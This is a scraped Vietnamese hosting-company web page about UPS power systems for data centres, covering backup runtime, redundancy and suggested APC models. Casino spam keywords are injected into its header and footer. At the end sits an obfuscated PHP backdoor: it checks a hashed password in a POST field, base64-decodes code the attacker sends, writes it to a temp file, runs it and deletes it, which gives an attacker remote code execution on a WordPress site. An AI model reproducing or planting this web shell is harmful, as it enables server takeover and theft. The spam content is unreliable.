Hệ thống lưu điện UPS cho Trung tâm dữ liệu - Máy Chủ Việt Nam
jeu plinko avis pin up catcasino vavada официальный jucky jet

Hệ thống lưu điện UPS cho Trung tâm dữ liệu

Ngày 07/02/2013 đăng bởi seo3.VS [email protected]

Thiết bị trong Datacenter cần hoạt động liên tục 24/24h .Vì vậy cần sử dụng UPS cung cấp nguồn liên tục khi chuyển từ điện lưới sang máy phát điện và ngược lai .

Dựa theo yêu cầu sử dụng, hệ thống lưu điện UPS online đề xuất phải có khả năng cung cấp đủ nguồn điện và có công suất dự phòng theo cấu hình (N+1,2N) .

 Thời gian lưu điện 15 phút để cung cấp đủ thời gian cho máy phát điện khởi động cũng như khi có yêu cầu tắt an toàn (graceful shutdown) các máy chủ.

 Khả năng quản trị cho phép khách hàng theo dõi giám sát hệ thống nguồn từ xa, thu thập các thông tin như số liệu ăcquy, số liệu giám sát môi trường đồng thời nâng cao khả năng dự đoán trước và ngăn chặn các sự cố có thể xảy ra.

 

Các tiêu chí cần có trong một UPS:

  • Yêu cầu nguồn điện 3 pha đầu vào.
  • Công suất tối thiểu của UPS.
  • Khả năng mở rộng công suất trong tương lai.
  • Có chức năng giám sát và quản lý hoạt động UPS.
  • Hỗ trợ việc chuyển nguồn tự động khi nguồn điện chính (điện lưới) qua nguồn điện dự phòng (UPS) và ngược lại, hoặc bằng tay khi có sự cố hoặc bảo trì.
  • Bình ắc qui của UPS sẽ cung cấp điện trong suốt thời gian mất nguồn điện chính và thời gian này kéo dài 15 phút. Khoảng thời gian này đủ để khởi động máy phát điện dự phòng .

Các sản phẩm UPS thường sử dụng cho Data Center:

  • Smart-UPS VT.
  • Symmetra PX.
  • Symmetra MW.
  • Galaxy.

 

.
.
.
.
Danh mục sản phẩm
024 7303 4068
jeu plinko avis pin up catcasino vavada официальный jucky jet
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}